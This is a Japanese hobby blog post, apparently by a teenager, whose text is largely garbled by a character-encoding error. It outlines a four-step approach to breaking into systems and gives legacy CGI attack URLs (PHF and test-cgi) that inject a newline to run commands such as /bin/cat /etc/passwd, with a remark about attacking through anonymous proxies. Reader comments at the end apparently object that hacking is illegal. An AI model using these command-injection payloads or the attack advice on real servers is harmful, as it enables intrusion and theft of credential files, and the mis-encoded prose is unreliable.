Entries

¥Ï¥Ã¥­¥ó¥°¤Ë¤Ä¤¤¤Æ

ºòÆü¡Ö¥Ö¥é¥Ã¥Ç¥£¡¦¥Þ¥ó¥Ç¥¤¡×¤Ç¥Ï¥Ã¥­¥ó¥°¤ò¤·¤Æ¤¤¤¿¤Î¤Ç¾è¤»¤Æ¤ß¤Þ¤·¤¿

Ť¯¤Ê¤ë¤Î¤Ç¡¡Â³¤­¤ò¸«¤ë¤Ç¤ª´ê¤¤¤·¤Þ¤¹
¡Ú¹¶·â¸¶Íý¡Û

Hack¤¹¤ë¤È¤¤¤¦»ö¤Ï¡¢·è¤Ã¤¿¥ë¡¼¥ë¤¬¤¢¤Ã¤¿¤ê¡¢Æñ¤·¤¤»ö¤Ç¤Ï¤¢¤ê¤Þ¤»
¤ó¡£¤·¤«¤·¡¢¤¿¤¤¤Æ¤¤¤Î¥·¥¹¥Æ¥à¤Ë¤Ï¡¢Hack¤¹¤ë¤Î¤Ë4¤Ä¤Î´ðËÜŪ¤Ê»ö¤¬
¤¢¤ë¤È¤¤¤¨¤Þ¤¹¡£¤½¤ì¤é¤òÍý²ò¤¹¤ëɬÍפ¬ÅöÁ³¤¢¤ê¤Þ¤¹¡£
¤½¤Î4¤Ä¤Î´ðËÜ»ö¹à¤È¤Ï¤Ê¤ó¤Ç¤·¤ç¤¦¤«¡©

1.¥¿¡¼¥²¥Ã¥È¤Î¹¶·âÁ°¤Ë¡¢½ÐÍè¤ë¸Â¤ê¤½¤Î¥·¥¹¥Æ¥à¤Ë¤Ä¤¤¤Æ¾ðÊó¤ò¼ý½¸
¤·¤Þ¤¹¡£¤½¤·¤Æ¡¢¥´¡¼¥ë¤ò·è¤á¤Þ¤¹¡£Hack¤·¤Æ²¿¤òÆÀ¤ë¤Î¤«¤ò¹Í¤¨¤Þ
¤¹¡£¡Ê¥¢¥«¥¦¥ó¥È¡©ÈëÌ©¤Î¥Õ¥¡¥¤¥ë¡©¡Ë

2.¥·¥¹¥Æ¥à¤Ë¥¢¥¯¥»¥¹¤·¤Æ¤ß¤Þ¤¹¡£ÌÞÏÀ¡¢¤½¤Î¥Ý¥¤¥ó¥È¤¬´Ö°ã¤¤¤Ê¤¯¡¢
¹¶·â¤¹¤Ù¤­Éôʬ¤Ç¤¢¤ë¤È¤¤¤¦»ö¤¬¾ò·ï¤Ç¤¹¡£¤Ä¤Þ¤ê¡¢ÉáÄ̤Υ桼¥¶¡¼
¤È¤·¤Æ¥¢¥¯¥»¥ë¤¹¤ë¤Î¤«¡¢FTP¤Ê¤Î¤«¡¢Sendmail¤Î¥Ð¥°¤ò¤Ä¤¯¤Î¤«¡¢¤È
¤¤¤Ã¤¿»ö¤Ç¤¹¡£¤¤¤º¤ì¤Ë¤·¤í¡¢Ä¾ÀÜ¡¢´ÖÀܤ˥¢¥¯¥»¥¹¤Ç¤­¤Ê¤±¤ì¤Ð¡¢
²¿¤â»Ï¤Þ¤ê¤Þ¤»¤ó¡£

3.¥·¥¹¥Æ¥à¤Ø¤Î¥¢¥¯¥»¥¹¤ò¤Ø¤Æ¡¢¤½¤ÎÃæ¤ËÆþ¤ì¤ë¤Î¤Ê¤é¡¢¼¡¤Ë¥È¥í¥¤¤Î
ÌÚÇϤòÃíÆþ¤·¤¿¤ê¡¢¥Ñ¥¹¥ï¡¼¥É¥Õ¥¡¥¤¥ë¤ò¥³¥Ô¡¼¤·¥¯¥é¥Ã¥¯¤·¤Þ¤¹¡£
¤½¤·¤Æ¡¢¤½¤Î¥·¥¹¥Æ¥à¤Î´ÉÍý¼Ô¤ä¥æ¡¼¥¶¡¼¤¬ÈëÌ©¤Ë¤·¤Æ¤ª¤­¤¿¤¤¥Õ¥¡
¥¤¥ë¤Ê¤É¤ò¸«ÉÕ¤±¤ë»ö¤¬¤Ç¤­¤Þ¤¹¡£

4.±£¤µ¤ì¤¿·ÐÏ©¡¢¤Ä¤Þ¤êBackdoor¤Îõº÷¤â¡¢¤â¤¦¤Ò¤È¤Ä¤ÎÊýË¡¤Ç¤¹¡£
¥·¥¹¥Æ¥à´ÉÍý¼Ô¤ä¡¢¥µ¥¤¥È¤Î´ÉÍý¼Ô¤¬¡¢¼«Ê¬¡Ê¤Þ¤¿¤Ï¥¹¥¿¥Ã¥Õ¡Ë¤À¤±
¤Ë²òÊü¤·¤Æ¤¤¤ëÆþ¤ê¸ý¤òÀߤ±¤ë»ö¤¬Â¿¤¤¤Î¤Ç¤¹¡£
¤·¤«¤·¡¢¤½¤Î·ÐÏ©¤Ø¤Î¥¢¥¯¥»¥¹¤Ïµ­Ï¿¤µ¤ì¡¢¿¯Æþ¤Î¸å¤ËËõ¾Ã¤µ¤ì¤ë²Ä
ǽÀ­¤¬¤¢¤ê¤Þ¤¹¡£¤·¤«¤·¡¢¤³¤ì¤â¤Ò¤È¤Ä¤ÎÊýË¡¤Ç¤¹¡£


¤³¤Î4¤Ä¤Î»öÊÁ¤ò¡¢¿¿¤Ë¿È¤Ë¤Ä¤±¤ë¤Î¤Ê¤é¤Ð¡¢Hack¤Ë¤µ¤·¤Æº¤Æñ¤Ï¤¢¤ê¤Þ
¤»¤ó¡£¤Ç¤Ï¡¢¼ÂºÝ¤Ë¹Ô¤ï¤ì¤¿²áµî¤Î»öÎã¤ò¸«¤Æ¡¢¹Í¤¨¤Æ¤ß¤Þ¤·¤ç¤¦¡£


¡¦¹¶·âʼ´ï¤ËÊѿȤ¹¤ë¥×¥é¥¦¥¶¥½¥Õ¥È no.1

Web¥µ¡¼¥Ð¡¼¤Ï¡¢Ä̾ïroot¡Ê¥·¥¹¥Æ¥à´ÉÍý¼Ô¡Ë´Ä¶­²¼¤Çưºî¤·¤Æ¤¤¤ë»ö¤¬
¿¤¤¤Ç¤¹¡£¤È¤¤¤¦»ö¤Ï¡¢Web¥µ¡¼¥Ð¡¼¤Ë¡¢²¿¤«¤ò¤µ¤»¤ë»ö¤Ï¡¢¤Ä¤Þ¤ê¤Ï¡¢
¥·¥¹¥Æ¥à´ÉÍý¼Ô¤¬¡¢¤½¤ì¤ò¼Â¹Ô¤·¤Æ¤¤¤ë»ö¤ò°ÕÌ£¤·¤Þ¤¹¡£

¤µ¤Æ¡¢Web¥µ¡¼¥Ð¡¼¤Ï¡¢ÉÔÆÃÄê¿¿ô¤Î¿Í¤Ë¸«¤Æ¤â¤é¤¦¤¿¤á¤Ë¤¢¤ê¤Þ¤¹¡£Éá
Ä̤Ϥ½¤¦»×¤¤¤Þ¤¹¡£¹¶·â¸¶Íý¤Ë¤¢¤ë¤è¤¦¤Ë¡¢¥·¥¹¥Æ¥à¤Ø¤Î¥¢¥¯¥»¥¹¤¹¤ë
ÊýË¡¤È¼êÃʤ¬¤¢¤ë»ö¤Ë¤Ê¤ê¤Þ¤¹¡£
IE¤ä¥Í¥¹¥±¤¬¤½¤Î¥Ä¡¼¥ë¤Ç¤¹¡£

Á°½Ò¤Î¤È¤ª¤ê¡¢Web¥µ¡¼¥Ð¡¼¤¬root´Ä¶­²¼¤Ë¤¢¤ë»ö¤¬¡¢¤³¤Î¥»¥­¥å¥ê¥Æ¥£
¥ê¥¹¥¯¤ò¡¢¤µ¤é¤ËÁýÂ礵¤»¤Þ¤¹¡£¤Ç¤Ï¡¢¤É¤¦¤ä¤ë¤Î¤Ç¤·¤ç¤¦¤«¡£
°Ê²¼¤Ë¡¢²áµî¤Ë¤ª¤³¤Ã¤¿¥¢¥¿¥Ã¥¯¤ÎÊýË¡¤Ë¤Ä¤¤¤Æ¡¢²òÀ⤷¤Þ¤¹¡£


¡ÚPHF¥¢¥¿¥Ã¥¯¡Û

¸½ºß¡¢¤³¤ÎÊýË¡¤Ï¡¢¤«¤Ê¤êÄÄÉå¤È¤Ê¤Ã¤Æ¤·¤Þ¤¤¤Þ¤·¤¿¤¬¡¢Web¥µ¡¼¥Ð¡¼¤Î
Hack¤Ë´Ø¤·¤Æ¤Ï¡¢¤½¤ÎÊýË¡¤Î´ðËܤò¾Ýħ¤¹¤ë¤è¤¦¤Ê¥¢¥¿¥Ã¥¯¤Ç¤¹¡£

PHF¥Õ¥¡¥¤¥ë¤Ï¡¢CGI¥¹¥¯¥ê¥×¥È¤Î»öÎã¤È¤·¤Æ¡¢¥Ç¥Õ¥©¥ë¥È¤Ç¥¤¥ó¥¹¥È¡¼
¥ë¤µ¤ì¤ë¥Õ¥¡¥¤¥ë¤Ç¡¢Phonebook·Á¼°¤Î¥ê¥¹¥È¤òUPDATE¤¹¤ë¤â¤Î¤Ç¤¹¡£
CGI¤ò¤½¤ÎWeb¥µ¡¼¥Ð¡¼¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤¹¤ë¤È,/cgi-bin/¤Î¥Ç¥£¥ì¥¯¥È¥ê
¤ÎÃæ¤Ë¡¢phf¤Ïºî¤é¤ì¤Þ¤¹¡£¤½¤·¤Æ¡¢¤½¤Î»ö¤òÅö½é¡¢¥·¥¹¥Æ¥à´ÉÍý¼Ô¤ÏÃÎ
¤é¤Ê¤«¤Ã¤¿¤Î¤Ç¤¹¡£

Unix¥µ¡¼¥Ð¡¼¤Ë¤ª¤±¤ë¥¢¥¿¥Ã¥¯ÊýË¡¤È¤·¤Æ¤Ï¡¢°Ê²¼¤Î¤è¤¦¤Ê¤â¤Î¤¬¤¢¤ê
¤Þ¤¹¡£

http://¡ü¡ü¡ü¡ü.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
¢¬ ¥¿¡¼¥²¥Ã¥È¥µ¥¤¥È¤ÎURL¡¦¥É¥á¥¤¥ó̾

¤³¤ì¤Ï¡¢¥×¥é¥¦¥¶¥½¥Õ¥È¤Î¡Ö¥¢¥É¥ì¥¹¡×¤È¤«¡Ö¾ì½ê¡×Åù¤ÎURL¤¬¸½¤ì¤ë¾ì
½ê¤Ë¡¢¤¤¤ì¤Æ¥ê¥¿¡¼¥ó¤òᤱ¤ÐOK¤Ç¤¹¡£
¤Þ¤¿¡¢Æ±Íͤʾ¤Î¥¢¥¿¥Ã¥¯½ñ¼°¤È¤·¤Æ¤Ï¡¢°Ê²¼¤Ç¤¹¡£

http://¡ü¡ü¡ü¡ü.com/cgi-bin/phf?%0aid==haqr=
¡Êid¥³¥Þ¥ó¥É¤Î¼Â¹Ô¡Ë

http://¡ü¡ü¡ü¡ü.com/cgi-bin/phf?%0als%20-la%20%7E¢¥¢¥¢¥==
¥æ¡¼¥¶¡¼¤ÎID¡Ê/~xxxxx ¤Ë¤è¤¯¸«¤é¤ì¤ë¡Ë¢¬¡Êls -la ~someuser ¥³¥Þ¥ó¥É¤Î¼Â¹Ô¡Ë

¸½ºß¤Ç¤â¡¢¤³¤Î¹¶·â¤¬²Äǽ¤Ê¥Þ¥Ì¥±¤Ê¥Þ¥·¥ó¤Ï¤Ê¤¤¤È»×¤¤¤Þ¤¹¤¬¡¢¤¢¤ì
¤Ð¤È¤Æ¤â¥é¥Ã¥­¡¼¤Ç¤Ï¤Ê¤¤¤Ç¤·¤ç¤¦¤«¡£ÌÞÏÀ¡¢¥¢¥¿¥Ã¥¯¼Â¹Ô¤Î¾ì¹ç¤Ï¡¢
ƿ̾À­¤Î¹â¤¤Proxy¥µ¡¼¥Ð¡¼·Ðͳ¤Ç¤Î¹¶·â¤¬¾ï¼±¤Ç¤¹¡£



¡¦¹¶·âʼ´ï¤ËÊѿȤ¹¤ë¥×¥é¥¦¥¶¥½¥Õ¥È no.2

¡Ú¡ÉTEST¡É¥¢¥¿¥Ã¥¯¡Û

Ʊ¤¸¤¯CGI¥¹¥¯¥ê¥×¥È¤ÎÃæ¤Ç¡¢Test ¥¹¥¯¥ê¥×¥È¤È¤¤¤¦¤Î¤¬¤¢¤ê¤Þ¤¹¡£
½ñ¼°,¤È¤·¤Æ¤Ï¡¢°Ê²¼¤Ç¤¹¡£

http://¡ü¡ü¡ü¡ü.com/cgi-bin/test-cgi?\whatever

¤â¤·¡¢¤³¤Î¥¹¥¯¥ê¥×¥È¤¬ºï½ü¤µ¤ì¤º¤Ë¥µ¡¼¥Ð¡¼¤Ë¤¢¤ì¤Ð¡¢¤­¤Ã¤È¤³¤ó¤Ê
±þÅú¤¬Ê֤äƤ¯¤ë¤Ç¤·¤ç¤¦¡£

CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

¤É¤³¤«¤Ç¤ß¤¿»ö¤¢¤ë¤È»×¤¤¤Þ¤»¤ó¤«¡£

¤µ¤Æ¡¢PHF¤Î¤È¤³¤í¤Ç¤â½Ð¤Þ¤·¤¿¤¬¡¢¡Ö0a¡×¥­¥ã¥é¥¯¥¿¤ò¤³¤³¤Ç¤â¤¦1ÅÙ
»È¤¤¤Þ¤¹¡£
¤È¤³¤í¤Ç¡¢¤³¤Î[¡Ö0a¡×¥­¥ã¥é¥¯¥¿¤Ê¤ó¤Ç¤¹¤¬¡¢¼Â¤Ë¤ª¤â¤·¤í¤¤Æ¯¤­¤ò¤¹
¤ë¤é¤·¤¤¤Î¤Ç¤¹¡£Â¾¤Î¥Õ¥¡¥¤¥ë¤ò°ú¤ÃÄ¥¤Ã¤Æ¤¯¤ë¤È¤¤¤¦ºîÍѤǤ¹¡£¤³¤ì
¤òÍøÍѤ·¤Æ¡¢¥Ñ¥¹¥ï¡¼¥É¥Õ¥¡¥¤¥ë¤ò±ÜÍ÷¤¹¤ë¤Ë¤Ï°Ê²¼¤Î½ñ¼°¤Ë¤Ê¤ê¤Þ¤¹¡£

http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd

¤â¤·¡¢¤³¤Î¡Ö0a¡×¥­¥ã¥é¥¯¥¿¤Îʸ»úÎó¤ÎºîÍѤ¬¥­¥ã¥ó¥»¥ë¤µ¤ì¤Æ¤¤¤Ê¤±
¤ì¤Ð¡¢¤³¤ì¤â¤Þ¤¿Í­¸ú¤ÊÊýË¡¤Ç¤¹¡£

4·ï¤Î¥³¥á¥ó¥È

[C35]

¤Þ¤¢¤Þ¤¢¤Þ¤¢¡¢»³ºù¤µ¤ó¡¢ÃΤé¤Ê¤¤¿Í¤¬¤¤¤ë¤Î¤Ï̵Íý¤â¤Ê¤¤¤ó¤À¤«¤é¤â¤¦¾¯¤·ÍÞ¤¨¤Æ¹Ô¤Ã¤Æ¤¢¤²¤Æ¡£
  • 2008-10-15
  • Åê¹Æ¼Ô : ÌÚú
  • URL
  • ÊÔ½¸

[C32] ¥Ï¥Ã¥­¥ó¥°¤Ï

¥Ï¥Ã¥­¥ó¥°¤Ï°ãË¡¤¸¤ã¤Í¡¼¥Ð¡¼¤«
¤½¤ó¤Ê¤³¤È¤âÃΤ餺¤Ë¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤¹¤ó¤¸¤ã¤Í¡¼¤è¡¡Ž¶Ž½Ž¶ŽÞ
¤È¤Ã¤È¤È¥Í¥Ã¥È¤«¤éűÂष¤Ê
°­¤¤¤Î¤Ï¥¯¥é¥Ã¥­¥ó¥°¤À
°ì½ï¤Ë¤¹¤ó¤Ê¡¡½é¿´¼Ô¤¬

[C29] ´ÉÍý¿Í¤Î¤ß±ÜÍ÷¤Ç¤­¤Þ¤¹

¤³¤Î¥³¥á¥ó¥È¤Ï´ÉÍý¿Í¤Î¤ß±ÜÍ÷¤Ç¤­¤Þ¤¹

[C28]

¥É¥é¥Þ¤Ç¤ä¤Ã¤Æ¤¿¤é¤·¤Æ¤¤¤¤¤Ã¤ÆŽÜ޹¤¸¤ã¤Ê¤¤¤«¤é¤Í¡ª¡ª
¤¤¤¯¤é¤Ê¤ó¤Ç¤â¥Ï¥Ã¥­¥ó¥°¤î°ãË¡¤À¤«¤é¡ª¡ª
  • 2008-10-13
  • Åê¹Æ¼Ô : Îë²»
  • URL
  • ÊÔ½¸

¥³¥á¥ó¥È¤ÎÅê¹Æ

¿·µ¬
Åê¹Æ¤·¤¿ÆâÍÆ¤Ï´ÉÍý¼Ô¤Ë¤À¤±±ÜÍ÷½ÐÍè¤Þ¤¹

0·ï¤Î¥È¥é¥Ã¥¯¥Ð¥Ã¥¯

¥È¥é¥Ã¥¯¥Ð¥Ã¥¯URL
http://edita.blog45.fc2.com/tb.php/100-925fc68d
¤³¤Îµ­»ö¤ËÂФ·¤Æ¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¤òÁ÷¿®¤¹¤ë¡ÊFC2¥Ö¥í¥°¥æ¡¼¥¶¡¼¡Ë

Appendix

¥Ö¥í¥°Æâ¸¡º÷

¥µ¥¤¥È¤ÎÃÍÃÊ

¥¸¥ª¥·¥Æ¥£


¥¸¥ª¥¿¡¼¥²¥Æ¥£¥ó¥°

ºÇ¶á¤Îµ­»ö

ÅìÊý¥Û¥¤¥Û¥¤

¥¢¥¯¥»¥¹²òÀÏ

¥×¥í¥Õ¥£¡¼¥ë

¤Â¤å¡¼¤¯

Author:¤Â¤å¡¼¤¯
ǯÎð¡¡14ºÍ
¹¥¤­¤Ê»öDQ&FF¤Ê¤É¤Ê¤É

¥é¥ó¥­¥ó¥°

º£¤Î¥é¥ó¥­¥ó¥°¤Ï

¥Õ¥ê¡¼¥¨¥ê¥¢

޾ŽÞŽËޏިޝޏަ
CoRich¥Ö¥í¥°¥é¥ó¥­¥ó¥°

ÀµÃË¥é¥ó¥À¥à¥²¡¼¥à

By FC2¥Ö¥í¥°

º£¤¹¤°¥Ö¥í¥°¤òºî¤í¤¦¡ª

Powered By FC2¥Ö¥í¥°

¥Ö¥í¤È¤â¿½ÀÁ¥Õ¥©¡¼¥à

¤³¤Î¿Í¤È¥Ö¥í¤È¤â¤Ë¤Ê¤ë

FC2¥Ö¥í¥°